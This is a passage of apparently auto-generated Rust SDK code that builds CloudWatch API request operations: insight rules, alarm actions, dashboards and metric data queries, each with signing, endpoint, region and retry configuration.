smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::DisableInsightRules::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"DisableInsightRules",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`DisableInsightRulesInput`](crate::input::DisableInsightRulesInput)
pub fn builder() -> crate::input::disable_insight_rules_input::Builder {
crate::input::disable_insight_rules_input::Builder::default()
}
}
/// See [`EnableAlarmActionsInput`](crate::input::EnableAlarmActionsInput)
pub mod enable_alarm_actions_input {
/// A builder for [`EnableAlarmActionsInput`](crate::input::EnableAlarmActionsInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) alarm_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl Builder {
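/// <p>The names of the alarms. Each call appends one name; use
/// <code>set_alarm_names</code> to replace the whole list.</p>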
pub fn alarm_names(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.alarm_names.unwrap_or_default();
v.push(input.into());
self.alarm_names = Some(v);
self
}
pub fn set_alarm_names(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.alarm_names = input;
self
}
/// Consumes the builder and constructs an [`EnableAlarmActionsInput`](crate::input::EnableAlarmActionsInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::EnableAlarmActionsInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::EnableAlarmActionsInput {
alarm_names: self.alarm_names,
})
}
}
}
#[doc(hidden)]
pub type EnableAlarmActionsInputOperationOutputAlias = crate::operation::EnableAlarmActions;
#[doc(hidden)]
pub type EnableAlarmActionsInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl EnableAlarmActionsInput {
/// Consumes the builder and constructs an Operation<[`EnableAlarmActions`](crate::operation::EnableAlarmActions)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::EnableAlarmActions,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_enable_alarm_actions(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::EnableAlarmActions::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"EnableAlarmActions",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`EnableAlarmActionsInput`](crate::input::EnableAlarmActionsInput)
pub fn builder() -> crate::input::enable_alarm_actions_input::Builder {
crate::input::enable_alarm_actions_input::Builder::default()
}
}
/// See [`EnableInsightRulesInput`](crate::input::EnableInsightRulesInput)
pub mod enable_insight_rules_input {
/// A builder for [`EnableInsightRulesInput`](crate::input::EnableInsightRulesInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) rule_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl Builder {
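/// <p>An array of the rule names to enable. If you need to find out the names of your
/// rules, use <code>DescribeInsightRules</code>.</p>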
pub fn rule_names(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.rule_names.unwrap_or_default();
v.push(input.into());
self.rule_names = Some(v);
self
}
pub fn set_rule_names(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.rule_names = input;
self
}
/// Consumes the builder and constructs an [`EnableInsightRulesInput`](crate::input::EnableInsightRulesInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::EnableInsightRulesInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::EnableInsightRulesInput {
rule_names: self.rule_names,
})
}
}
}
#[doc(hidden)]
pub type EnableInsightRulesInputOperationOutputAlias = crate::operation::EnableInsightRules;
#[doc(hidden)]
pub type EnableInsightRulesInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl EnableInsightRulesInput {
/// Consumes the builder and constructs an Operation<[`EnableInsightRules`](crate::operation::EnableInsightRules)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::EnableInsightRules,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_enable_insight_rules(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::EnableInsightRules::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"EnableInsightRules",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`EnableInsightRulesInput`](crate::input::EnableInsightRulesInput)
pub fn builder() -> crate::input::enable_insight_rules_input::Builder {
crate::input::enable_insight_rules_input::Builder::default()
}
}
/// See [`GetDashboardInput`](crate::input::GetDashboardInput)
pub mod get_dashboard_input {
/// A builder for [`GetDashboardInput`](crate::input::GetDashboardInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) dashboard_name: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The name of the dashboard to be described.</p>
pub fn dashboard_name(mut self, input: impl Into<std::string::String>) -> Self {
self.dashboard_name = Some(input.into());
self
}
pub fn set_dashboard_name(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.dashboard_name = input;
self
}
/// Consumes the builder and constructs a [`GetDashboardInput`](crate::input::GetDashboardInput)
pub fn build(
self,
) -> std::result::Result<crate::input::GetDashboardInput, smithy_http::operation::BuildError>
{
Ok(crate::input::GetDashboardInput {
dashboard_name: self.dashboard_name,
})
}
}
}
#[doc(hidden)]
pub type GetDashboardInputOperationOutputAlias = crate::operation::GetDashboard;
#[doc(hidden)]
pub type GetDashboardInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl GetDashboardInput {
/// Consumes the builder and constructs an Operation<[`GetDashboard`](crate::operation::GetDashboard)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::GetDashboard,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body =
crate::operation_ser::serialize_operation_get_dashboard(&self).map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::GetDashboard::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"GetDashboard",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`GetDashboardInput`](crate::input::GetDashboardInput)
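///
/// A minimal usage sketch (the crate name `aws_sdk_cloudwatch` is an assumption):
///
/// ```ignore
/// let input = aws_sdk_cloudwatch::input::GetDashboardInput::builder()
///     .dashboard_name("my-service-overview")
///     .build()
///     .expect("valid GetDashboardInput");
/// ```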
pub fn builder() -> crate::input::get_dashboard_input::Builder {
crate::input::get_dashboard_input::Builder::default()
}
}
/// See [`GetInsightRuleReportInput`](crate::input::GetInsightRuleReportInput)
pub mod get_insight_rule_report_input {
/// A builder for [`GetInsightRuleReportInput`](crate::input::GetInsightRuleReportInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) rule_name: std::option::Option<std::string::String>,
pub(crate) start_time: std::option::Option<smithy_types::Instant>,
pub(crate) end_time: std::option::Option<smithy_types::Instant>,
pub(crate) period: std::option::Option<i32>,
pub(crate) max_contributor_count: std::option::Option<i32>,
pub(crate) metrics: std::option::Option<std::vec::Vec<std::string::String>>,
pub(crate) order_by: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The name of the rule that you want to see data from.</p>
pub fn rule_name(mut self, input: impl Into<std::string::String>) -> Self {
self.rule_name = Some(input.into());
self
}
pub fn set_rule_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.rule_name = input;
self
}
/// <p>The start time of the data to use in the report. When used in a raw HTTP Query API, it is formatted as
/// <code>yyyy-MM-dd'T'HH:mm:ss</code>. For example,
/// <code>2019-07-01T23:59:59</code>.</p>
pub fn start_time(mut self, input: smithy_types::Instant) -> Self {
self.start_time = Some(input);
self
}
pub fn set_start_time(mut self, input: std::option::Option<smithy_types::Instant>) -> Self {
self.start_time = input;
self
}
/// <p>The end time of the data to use in the report. When used in a raw HTTP Query API, it is formatted as
/// <code>yyyy-MM-dd'T'HH:mm:ss</code>. For example,
/// <code>2019-07-01T23:59:59</code>.</p>
pub fn end_time(mut self, input: smithy_types::Instant) -> Self {
self.end_time = Some(input);
self
}
pub fn set_end_time(mut self, input: std::option::Option<smithy_types::Instant>) -> Self {
self.end_time = input;
self
}
/// <p>The period, in seconds, to use for the statistics in the <code>InsightRuleMetricDatapoint</code> results.</p>
pub fn period(mut self, input: i32) -> Self {
self.period = Some(input);
self
}
pub fn set_period(mut self, input: std::option::Option<i32>) -> Self {
self.period = input;
self
}
/// <p>The maximum number of contributors to include in the report. The range is 1 to 100. If you omit this, the default of 10 is used.</p>
pub fn max_contributor_count(mut self, input: i32) -> Self {
self.max_contributor_count = Some(input);
self
}
pub fn set_max_contributor_count(mut self, input: std::option::Option<i32>) -> Self {
self.max_contributor_count = input;
self
}
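/// <p>Specifies which metrics to use for aggregation of contributor values for the report.
/// Each call appends one value.</p>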
pub fn metrics(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.metrics.unwrap_or_default();
v.push(input.into());
self.metrics = Some(v);
self
}
pub fn set_metrics(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.metrics = input;
self
}
/// <p>Determines what statistic to use to rank the contributors. Valid values are SUM and MAXIMUM.</p>
pub fn order_by(mut self, input: impl Into<std::string::String>) -> Self {
self.order_by = Some(input.into());
self
}
pub fn set_order_by(mut self, input: std::option::Option<std::string::String>) -> Self {
self.order_by = input;
self
}
/// Consumes the builder and constructs a [`GetInsightRuleReportInput`](crate::input::GetInsightRuleReportInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::GetInsightRuleReportInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::GetInsightRuleReportInput {
rule_name: self.rule_name,
start_time: self.start_time,
end_time: self.end_time,
period: self.period,
max_contributor_count: self.max_contributor_count,
metrics: self.metrics,
order_by: self.order_by,
})
}
}
}
#[doc(hidden)]
pub type GetInsightRuleReportInputOperationOutputAlias = crate::operation::GetInsightRuleReport;
#[doc(hidden)]
pub type GetInsightRuleReportInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl GetInsightRuleReportInput {
/// Consumes the builder and constructs an Operation<[`GetInsightRuleReport`](crate::operation::GetInsightRuleReport)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::GetInsightRuleReport,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_get_insight_rule_report(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::GetInsightRuleReport::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"GetInsightRuleReport",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`GetInsightRuleReportInput`](crate::input::GetInsightRuleReportInput)
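///
/// A minimal usage sketch (the crate name `aws_sdk_cloudwatch` and the
/// `Instant::from_epoch_seconds` constructor are assumptions, hence the `ignore` fence):
///
/// ```ignore
/// // Report the top 10 contributors for one rule over a one-hour window,
/// // aggregated in 5-minute (300-second) periods.
/// let input = aws_sdk_cloudwatch::input::GetInsightRuleReportInput::builder()
///     .rule_name("top-talkers")
///     .start_time(smithy_types::Instant::from_epoch_seconds(1_609_459_200))
///     .end_time(smithy_types::Instant::from_epoch_seconds(1_609_462_800))
///     .period(300)
///     .max_contributor_count(10)
///     .build()
///     .expect("valid GetInsightRuleReportInput");
/// ```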
pub fn builder() -> crate::input::get_insight_rule_report_input::Builder {
crate::input::get_insight_rule_report_input::Builder::default()
}
}
/// See [`GetMetricDataInput`](crate::input::GetMetricDataInput)
pub mod get_metric_data_input {
/// A builder for [`GetMetricDataInput`](crate::input::GetMetricDataInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) metric_data_queries:
std::option::Option<std::vec::Vec<crate::model::MetricDataQuery>>,
pub(crate) start_time: std::option::Option<smithy_types::Instant>,
pub(crate) end_time: std::option::Option<smithy_types::Instant>,
pub(crate) next_token: std::option::Option<std::string::String>,
pub(crate) scan_by: std::option::Option<crate::model::ScanBy>,
pub(crate) max_datapoints: std::option::Option<i32>,
pub(crate) label_options: std::option::Option<crate::model::LabelOptions>,
}
impl Builder {
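/// <p>The metric queries to be returned. A single <code>GetMetricData</code> call can
/// include as many as 500 <code>MetricDataQuery</code> structures. Each call to this
/// method appends one query; use <code>set_metric_data_queries</code> to replace the list.</p>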
pub fn metric_data_queries(
mut self,
input: impl Into<crate::model::MetricDataQuery>,
) -> Self {
let mut v = self.metric_data_queries.unwrap_or_default();
v.push(input.into());
self.metric_data_queries = Some(v);
self
}
pub fn set_metric_data_queries(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::MetricDataQuery>>,
) -> Self {
self.metric_data_queries = input;
self
}
/// <p>The time stamp indicating the earliest data to be returned.</p>
/// <p>The value specified is inclusive; results include data points with the specified time stamp. </p>
/// <p>CloudWatch rounds the specified time stamp as follows:</p>
/// <ul>
/// <li>
/// <p>Start time less than 15 days ago - Round down to the nearest whole minute.
/// For example, 12:32:34 is rounded down to 12:32:00.</p>
/// </li>
/// <li>
/// <p>Start time between 15 and 63 days ago - Round down to the nearest 5-minute clock interval.
/// For example, 12:32:34 is rounded down to 12:30:00.</p>
/// </li>
/// <li>
/// <p>Start time greater than 63 days ago - Round down to the nearest 1-hour clock interval.
/// For example, 12:32:34 is rounded down to 12:00:00.</p>
/// </li>
/// </ul>
/// <p>If you set <code>Period</code> to 5, 10, or 30, the start time of your request is
/// rounded down to the nearest time that corresponds to even 5-, 10-, or 30-second divisions
/// of a minute. For example, if you make a query at (HH:mm:ss) 01:05:23 for the previous
/// 10-second period, the start time of your request is rounded down and you receive data from 01:05:10 to
/// 01:05:20. If you make a query at 15:07:17 for the previous 5 minutes of data, using a
/// period of 5 seconds, you receive data
/// timestamped between 15:02:15 and 15:07:15.
/// </p>
/// <p>For better performance, specify <code>StartTime</code> and <code>EndTime</code>
/// values that align with the value of the metric's <code>Period</code> and sync up with
/// the beginning and end of an hour. For example, if the <code>Period</code> of a metric
/// is 5 minutes, specifying 12:05 or 12:30 as <code>StartTime</code> can get a faster response
/// from CloudWatch than setting 12:07 or 12:29 as the <code>StartTime</code>.</p>
pub fn start_time(mut self, input: smithy_types::Instant) -> Self {
self.start_time = Some(input);
self
}
pub fn set_start_time(mut self, input: std::option::Option<smithy_types::Instant>) -> Self {
self.start_time = input;
self
}
/// <p>The time stamp indicating the latest data to be returned.</p>
/// <p>The value specified is exclusive; results include data points up to the specified time stamp.</p>
/// <p>For better performance, specify <code>StartTime</code> and <code>EndTime</code>
/// values that align with the value of the metric's <code>Period</code> and sync up with
/// the beginning and end of an hour. For example, if the <code>Period</code> of a metric
/// is 5 minutes, specifying 12:05 or 12:30 as <code>EndTime</code> can get a faster response
/// from CloudWatch than setting 12:07 or 12:29 as the <code>EndTime</code>.</p>
pub fn end_time(mut self, input: smithy_types::Instant) -> Self {
self.end_time = Some(input);
self
}
pub fn set_end_time(mut self, input: std::option::Option<smithy_types::Instant>) -> Self {
self.end_time = input;
self
}
/// <p>Include this value, if it was returned by the previous <code>GetMetricData</code> operation,
/// to get the next set of data points.</p>
pub fn next_token(mut self, input: impl Into<std::string::String>) -> Self {
self.next_token = Some(input.into());
self
}
pub fn set_next_token(mut self, input: std::option::Option<std::string::String>) -> Self {
self.next_token = input;
self
}
/// <p>The order in which data points should be returned. <code>TimestampDescending</code> returns the newest data first and paginates
/// when the <code>MaxDatapoints</code> limit is reached. <code>TimestampAscending</code> returns the oldest data first and paginates
/// when the <code>MaxDatapoints</code> limit is reached.</p>
pub fn scan_by(mut self, input: crate::model::ScanBy) -> Self {
self.scan_by = Some(input);
self
}
pub fn set_scan_by(mut self, input: std::option::Option<crate::model::ScanBy>) -> Self {
self.scan_by = input;
self
}
/// <p>The maximum number of data points the request should return before paginating. If you omit
/// this, the default of 100,800 is used.</p>
pub fn max_datapoints(mut self, input: i32) -> Self {
self.max_datapoints = Some(input);
self
}
pub fn set_max_datapoints(mut self, input: std::option::Option<i32>) -> Self {
self.max_datapoints = input;
self
}
        /// <p>This structure includes the <code>Timezone</code> parameter, which you can use
        /// to specify your time zone so that the labels of returned data display the
        /// correct time for your time zone.</p>
pub fn label_options(mut self, input: crate::model::LabelOptions) -> Self {
self.label_options = Some(input);
self
}
pub fn set_label_options(
mut self,
input: std::option::Option<crate::model::LabelOptions>,
) -> Self {
self.label_options = input;
self
}
/// Consumes the builder and constructs a [`GetMetricDataInput`](crate::input::GetMetricDataInput)
pub fn build(
self,
) -> std::result::Result<crate::input::GetMetricDataInput, smithy_http::operation::BuildError>
{
Ok(crate::input::GetMetricDataInput {
metric_data_queries: self.metric_data_queries,
start_time: self.start_time,
end_time: self.end_time,
next_token: self.next_token,
scan_by: self.scan_by,
max_datapoints: self.max_datapoints,
label_options: self.label_options,
})
}
}
}
#[doc(hidden)]
pub type GetMetricDataInputOperationOutputAlias = crate::operation::GetMetricData;
#[doc(hidden)]
pub type GetMetricDataInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl GetMetricDataInput {
/// Consumes the builder and constructs an Operation<[`GetMetricData`](crate::operation::GetMetricData)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::GetMetricData,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_get_metric_data(&self).map_err(
|err| smithy_http::operation::BuildError::SerializationError(err.into()),
)?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::GetMetricData::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"GetMetricData",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`GetMetricDataInput`](crate::input::GetMetricDataInput)
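    ///
    /// A minimal usage sketch, assuming a `crate::model::MetricDataQuery` named `query`
    /// has already been built (the timestamps are placeholders):
    ///
    /// ```ignore
    /// let input = crate::input::GetMetricDataInput::builder()
    ///     .metric_data_queries(query)
    ///     .start_time(smithy_types::Instant::from_epoch_seconds(1_600_000_000))
    ///     .end_time(smithy_types::Instant::from_epoch_seconds(1_600_003_600))
    ///     .build()?;
    /// ```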
pub fn builder() -> crate::input::get_metric_data_input::Builder {
crate::input::get_metric_data_input::Builder::default()
}
}
/// See [`GetMetricStatisticsInput`](crate::input::GetMetricStatisticsInput)
pub mod get_metric_statistics_input {
/// A builder for [`GetMetricStatisticsInput`](crate::input::GetMetricStatisticsInput)
#[non_exhaustive]
